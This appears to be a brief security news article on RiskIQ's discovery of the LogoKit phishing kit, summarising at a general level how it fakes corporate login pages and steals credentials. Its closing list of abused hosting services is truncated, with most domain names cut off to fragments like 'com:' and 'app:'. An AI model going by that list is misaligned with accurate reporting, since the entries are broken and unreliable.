Threat actors are investing more in phishing kits to simplify and expand their phishing activities. Cybercriminals are developing new phishing strategies and exploring different attack avenues by leveraging innovative phishing kits, which are widely available on the dark web market. Their growing demand on the underground market resembles how attackers are reliant on these tools.
Security firm RiskIQ recently uncovered a new kind of phishing kit dubbed “LogoKit.” The new kit is designed to deploy malware easily and allows other attackers to reuse and adapt.
How LogoKit Spreads?
- Initially, the attacker sends an email ID, hidden with a specially crafted malicious URL.
- Once a victim clicks on the URL, it redirects the user to a fake corporate web site.
- The victim’s email is auto-filled into the email or username field to trick the users into thinking they have previously logged into the site.
- If the victims enter their password, LogoKit sends the target’s email and password to an external source operated by threat actors.
- LogoKit allows attackers to easily compromise websites and embed the malware or malicious script in them.
RiskIQ claimed that LogoKit uses simple login forms to dupe users that are embedded into more complex HTML documents pretending to be other services, by fetching their logos from a third-party service like Clearbit or Google’s favicon database. RiskIQ found more than 700 unique domains running with LogoKit, targeting various services like SharePoint, Adobe Document Cloud, OneDrive, Office 365, and Cryptocurrency exchanges.
According to RiskIQ, the following legitimate services have been used by LogoKit actors:
- me: Application Deployment Platform
- com: Google Cloud Platform
- app: Google Firebase
- com: Google Firebase
- googleapis.com: Google Cloud Storage
- googleapis.com: Google Firebase Storage
- amazonaws.com: Amazon S3 Object Storage
- app: Google CodeSandbox
- yandexcloud.net: Yandex Static Hosting
- io: GitHub Static Page Hosting
- com: DigitalOcean Object Storage
- com: Oracle Object Storage
Related Story: Five Phishing Baits You Need to Know